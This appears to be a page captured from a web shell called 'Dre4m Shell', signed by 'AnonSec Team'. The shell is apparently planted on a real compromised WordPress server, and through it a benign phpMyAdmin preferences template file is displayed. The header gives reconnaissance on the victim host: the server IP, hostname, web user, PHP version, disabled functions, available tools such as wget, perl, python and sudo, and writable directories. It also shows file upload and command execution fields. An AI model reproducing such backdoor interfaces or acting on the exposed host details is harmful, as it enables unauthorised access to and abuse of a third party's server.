Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.21.46.82
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/wordpress/phpMyAdmin/templates/preferences/manage/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/wordpress/phpMyAdmin/templates/preferences/manage/main.twig
{{ error|raw }}
<script type="text/javascript">
    {{ get_js_value("Messages.strSavedOn", 'Saved on: @DATE@'|trans) }}
</script>
<div id="maincontainer">
    <div id="main_pane_left">
        <div class="group">
            <h2> {% trans 'Import' %} </h2>
            <form class="group-cnt prefs-form disableAjax" name="prefs_import" action="prefs_manage.php" method="post"
                  enctype="multipart/form-data">
                {{ generate_hidden_max_file_size(max_upload_size) }}
                {{ get_hidden_inputs() }}
                <input type="hidden" name="json" value="">
                <input type="radio" id="import_text_file" name="import_type" value="text_file" checked="checked">
                <label for="import_text_file"> {% trans 'Import from file' %} </label>
                <div id="opts_import_text_file" class="prefsmanage_opts">
                    <label for="input_import_file"> {% trans 'Browse your computer:' %} </label>
                    <input type="file" name="import_file" id="input_import_file">
                </div>
                <input type="radio" id="import_local_storage" name="import_type" value="local_storage"
                       disabled="disabled">
                <label for="import_local_storage"> {% trans 'Import from browser\'s storage' %} </label>
                <div id="opts_import_local_storage" class="prefsmanage_opts disabled">
                    <div class="localStorage-supported">
                        {% trans 'Settings will be imported from your browser\'s local storage.' %}
                        <br>
                        <div class="localStorage-exists">
                            {% trans 'Saved on: @DATE@' %}
                        </div>
                        <div class="localStorage-empty">
                            {{ 'You have no saved settings!'|trans|notice }}
                        </div>
                    </div>
                    <div class="localStorage-unsupported">
                        {{ 'This feature is not supported by your web browser'|trans|notice }}
                    </div>
                </div>
                <input type="checkbox" id="import_merge" name="import_merge">
                <label for="import_merge"> {% trans 'Merge with current configuration' %} </label>
                <br><br>
                <input class="btn btn-primary" type="submit" name="submit_import" value="{{ 'Go'|trans }}">
            </form>
        </div>
        {% if exists_setup_and_not_exists_config %}
            {# show only if setup script is available, allows to disable this message #}
            {# by simply removing setup directory #}
            {# Also do not show in config exists (and setup would refuse to work) #}
            <div class="group">
                <h2>{% trans 'More settings' %}</h2>
                <div class="group-cnt">
                    {{ 'You can set more settings by modifying config.inc.php, eg. by using %sSetup script%s.'|trans|format('<a href="setup/index.php" target="_blank">','</a>')|raw }}
                    {{ show_docu('setup', 'setup-script') }}
                </div>
            </div>
        {% endif %}
    </div>
    <div id="main_pane_right">
        <div class="group">
            <h2>{% trans 'Export' %}</h2>
            <div class="click-hide-message group-cnt hide">
                {{ 'Configuration has been saved.'|trans|raw_success }}
            </div>
            <form class="group-cnt prefs-form disableAjax" name="prefs_export"
                  action="prefs_manage.php" method="post">
                {{ get_hidden_inputs() }}
                <div>
                    <input type="radio" id="export_text_file" name="export_type"
                           value="text_file" checked="checked">
                    <label for="export_text_file">
                        {% trans 'Save as JSON file' %}
                    </label><br>
                    <input type="radio" id="export_php_file" name="export_type" value="php_file">
                    <label for="export_php_file">
                        {% trans 'Save as PHP file' %}
                    </label><br>
                    <input type="radio" id="export_local_storage" name="export_type" value="local_storage"
                           disabled="disabled">
                    <label for="export_local_storage">
                        {% trans 'Save to browser\'s storage' %}
                    </label>
                </div>
                <div id="opts_export_local_storage"
                     class="prefsmanage_opts disabled">
                    <span class="localStorage-supported">
                        {% trans 'Settings will be saved in your browser\'s local storage.' %}
                      <div class="localStorage-exists">
                            <b>
                                {% trans 'Existing settings will be overwritten!' %}
                            </b>
                        </div>
                    </span>
                    <div class="localStorage-unsupported">
                        {{ 'This feature is not supported by your web browser'|trans|notice }}
                    </div>
                </div>
                <br>
                <input class="btn btn-primary" type="submit" name="submit_export" value="{% trans 'Go' %}">
            </form>
        </div>
        <div class="group">
            <h2>{% trans 'Reset' %}</h2>
            <form class="group-cnt prefs-form disableAjax" name="prefs_reset"
                  action="prefs_manage.php" method="post">
                {{ get_hidden_inputs() }}
                {% trans 'You can reset all your settings and restore them to default values.' %}
                <br><br>
                <input class="btn btn-secondary" type="submit" name="submit_clear" value="{% trans 'Reset' %}">
            </form>
        </div>
    </div>
    <br class="clearfloat">
</div>

Anon7 - 2022
AnonSec Team